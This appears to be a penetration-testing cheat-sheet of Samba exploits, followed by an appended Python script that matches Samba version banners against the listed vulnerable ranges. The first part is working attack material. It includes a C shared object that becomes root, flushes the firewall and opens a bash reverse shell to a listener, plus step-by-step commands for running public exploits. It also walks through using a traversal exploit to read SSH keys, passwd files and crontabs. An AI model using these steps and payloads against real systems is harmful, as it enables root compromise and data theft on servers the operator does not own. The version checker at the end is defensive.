Samba Cry

Requires a writable share on Samba < 4.5.9.

  1. Use the CVE-2017-7494 tool (https://github.com/joxeankoret/CVE-2017-7494); it is written for Python 2.
  2. Use the reverseshell.c below (change IP and PORT to your listener).
  3. Compile it as a shared object: gcc -o reverseshell.so -shared reverseshell.c -fPIC
  4. Start a listener, then run the exploit: python cve_2017_7494.py -t IP -u user -P pass --custom reverseshell.so

reverseshell.c

#define _GNU_SOURCE          /* exposes the setresuid() prototype in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Marked as a constructor so it runs as soon as smbd loads the shared object. */
static void smash(void) __attribute__((constructor));

static void smash(void) {
    setresuid(0, 0, 0);                                     /* drop the impersonated user, become root */
    system("iptables -F");                                  /* flush firewall rules that would block the callback */
    system("bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'");   /* replace IP and PORT with the listener */
}

Samba Root RCE

Target must be running Samba < 2.2.8.

  1. (optional) To find the Samba version, capture traffic with Wireshark while running enum4linux -U IP. Back in Wireshark, right-click the "Session Setup AndX Request, User: anonymous" packet and choose Follow TCP Stream; the Samba version string is visible in the stream.
  2. Use exploit 10 (searchsploit -m 10). Compile with gcc 10.c -o sambal, then run ./sambal -b 0 IP

Samba username map script (CVE-2007-2447)

  1. python CVE-2007-2447.py targetIP targetPort ownIP ownPort (the target port is usually 139)

Samba symlink traversal (CVE-2010-0926)

Any Samba version before 3.3.11, 3.4.x-3.4.6, or 3.5.x-3.5.0rc3. Requires one writable share.

  1. Use the prebuilt CVE-2010-0926 executable (try not to compile it yourself, I failed) with the usage below: ./CVE-2010-0926 hostname sharename randomnewfoldername pathtoread (e.g. ./CVE-2010-0926 10.11.1.136 'Bob Share' rootdir ../../../../../../../../../../ creates a rootdir folder in the 'Bob Share' share that allows you to read ../../../../…..)
  2. Search for interesting things such as backups of SSH keys, the passwd file, crontabs, etc.
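The sections above each state a version range; the script below collects those ranges into one check that takes a Samba banner (as shown by enum4linux or a packet capture) and reports which of the listed issues apply, so a defender can see at a glance whether a host is in a listed range. This is an added example and is not part of this page or of any of the tools linked above. The thresholds are copied from the page as written (for instance "< 4.5.9" for CVE-2017-7494); the "3.4.x-3.4.6" and "3.5.x-3.5.0rc3" ranges are read as "before the listed release", which is an assumption about the page's notation, and the exploit-10 issue is labelled by the page's own name since the page gives no CVE for it. Confirm the exact fixed releases against vendor advisories before basing patch decisions on the output.

```python
"""Compare a Samba version banner against the version ranges listed on this page.

Added example, not from the page or the linked tools. The thresholds are the
page's numbers as written; verify them against vendor advisories.
"""

import re
import sys

# Matches "4.5.9", "3.5.0rc3", "Samba 4.5.9-Ubuntu", and so on. Suffixes other
# than "rcN" (e.g. the "a" in "2.2.7a") are ignored for the comparison.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")

# Release candidates sort before the final release (3.5.0rc3 < 3.5.0), so a
# final release gets a large sentinel in the fourth slot.
_FINAL = 10 ** 9


def parse_version(text):
    """Return (major, minor, patch, rc) for the first version found in text,
    or None when no version number is present."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else _FINAL)


def _v(text):
    """Shorthand for building a comparison bound from a version string."""
    return parse_version(text)


# (label, predicate) pairs. "before X" includes release candidates of X, which
# is why the bounds are built with _v() rather than written as bare tuples.
# The 3.4.x / 3.5.x bounds for CVE-2010-0926 are read as "before the listed
# release" (assumption about the page's "3.4.x-3.4.6" notation).
CHECKS = [
    ("CVE-2017-7494",
     lambda v: v < _v("4.5.9")),
    ("Samba Root RCE (searchsploit exploit 10)",
     lambda v: v < _v("2.2.8")),
    ("CVE-2010-0926",
     lambda v: v < _v("3.3.11")
               or (3, 4, 0, 0) <= v < _v("3.4.6")
               or (3, 5, 0, 0) <= v < _v("3.5.0rc3")),
]


def vulnerable_to(version_text):
    """Return the labels of the listed issues whose range contains the given
    Samba version. Raises ValueError when no version can be parsed."""
    v = parse_version(version_text)
    if v is None:
        raise ValueError("no version number found in %r" % version_text)
    return [label for label, in_range in CHECKS if in_range(v)]


def report(version_texts):
    """One result line per banner, e.g. for banners collected across a fleet."""
    lines = []
    for text in version_texts:
        try:
            hits = vulnerable_to(text)
        except ValueError as exc:
            lines.append("%s: %s" % (text, exc))
            continue
        lines.append("%s: %s" % (text, ", ".join(hits) if hits else "no listed issue"))
    return lines


if __name__ == "__main__":
    # Constructed sample banners (not real hosts); pass your own on the command line.
    sample = sys.argv[1:] or [
        "Samba 4.5.8-Debian",
        "Samba 3.4.5",
        "3.5.0rc2",
        "Samba 4.5.9",
        "Samba 2.2.7a",
    ]
    print("\n".join(report(sample)))
```

Run it with one or more banner strings as arguments (python samba_version_check.py "Samba 4.5.8-Debian"); with no arguments it checks the constructed samples. Because a final release is stored with a large sentinel in the rc slot, "before 4.5.9" correctly covers 4.5.9rc1 while excluding 4.5.9 itself.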